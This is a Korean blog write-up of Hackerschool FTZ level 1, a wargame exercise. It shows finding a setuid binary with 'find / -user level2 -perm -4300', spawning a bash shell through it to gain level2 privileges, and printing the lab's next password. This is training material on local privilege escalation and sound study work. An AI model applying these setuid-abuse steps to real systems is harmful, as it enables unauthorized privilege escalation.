해커스쿨 FTZ [LEVEL1] 풀이
M4ndU
해커스쿨 FTZ [LEVEL1] 풀이입니다.
ID | level1
PW | level1
으로 로그인합니다.
$ ls -l
를 이용해 어떤 파일과 어떤 폴더가 있는지 확인해 봅시다.
login as: level1
level1@192.168.31.128's password:
[level1@ftz level1]$ ls -l
total 12
-rw-r--r-- 1 root root 47 Apr 4 2000 hint
drwxr-xr-x 2 root level1 4096 Dec 7 2003 public_html
drwxrwxr-x 2 root level1 4096 Jan 16 2009 tmp
hint 파일이 있습니다.
cat 명령어를 통해 hint 파일의 내용을 확인해 봅시다.
[level1@ftz level1]$ cat hint
level2 권한에 setuid가 걸린 파일을 찾는다.
level2 권한에 setuid가 걸린 파일을 찾아 봅시다.
find 명령어를 사용하면 됩니다.
[level1@ftz level1]$ find / -user level2 -perm -4300
find: /lost+found: Permission denied
find: /boot/lost+found: Permission denied
find: /proc/1/fd: Permission denied
find: /proc/2/fd: Permission denied
find: /proc/3/fd: Permission denied
....(생략)
하지만 오류가 많아서 우리가 찾고자 하는 파일을 찾기 힘듭니다.
그래서 이 오류들을 제외시켜주는 옵션을 추가해 줍시다.
바로 2> /dev/null 입니다.
여기서 2는 표준에러, /dev/null은 휴지통을 의미합니다.
[level1@ftz level1]$ find / -user level2 -perm -4300 2> /dev/null
/bin/ExecuteMe
찾았습니다!
ExecuteMe가 존재하는 /bin으로 이동하고, ExecuteMe를 실행하겠습니다.
[level1@ftz level1]$ cd /bin
[level1@ftz bin]$ ./ExecuteMe
레벨2의 권한으로 당신이 원하는 명령어를
한가지 실행시켜 드리겠습니다.
(단, my-pass 와 chmod는 제외)
어떤 명령을 실행시키겠습니까?
[level2@ftz level2]$
레벨2의 권한으로 원하는 명령어를 실행시켜 준다는데, my-pass와 chmod는 안된다고 합니다.
그렇지만 우리는 다른 방법으로도 level2의 패스워드를 얻을 수 있습니다.
level2의 권한으로 bash를 띄워서 my-pass 명령어를 사용하면 됩니다.
[level2@ftz level2]$ bash
[level2@ftz level2]$ my-pass
Level2 Password is "hacker or cracker".
이제, 다음 레벨로 가즈아ㅏㅏㅏㅏㅏㅏㅏ
'System Hacking > FTZ' 카테고리의 다른 글
| 해커스쿨 FTZ [LEVEL5] 풀이 (2) | 2018.02.07 |
|---|---|
| 해커스쿨 FTZ [LEVEL4] 풀이 (0) | 2018.02.07 |
| 해커스쿨 FTZ [LEVEL3] 풀이 (0) | 2018.02.07 |
| 해커스쿨 FTZ [LEVEL2] 풀이 (0) | 2018.02.07 |
| 해커스쿨 FTZ 로컬서버 구축하는 방법 (2) | 2018.02.06 |
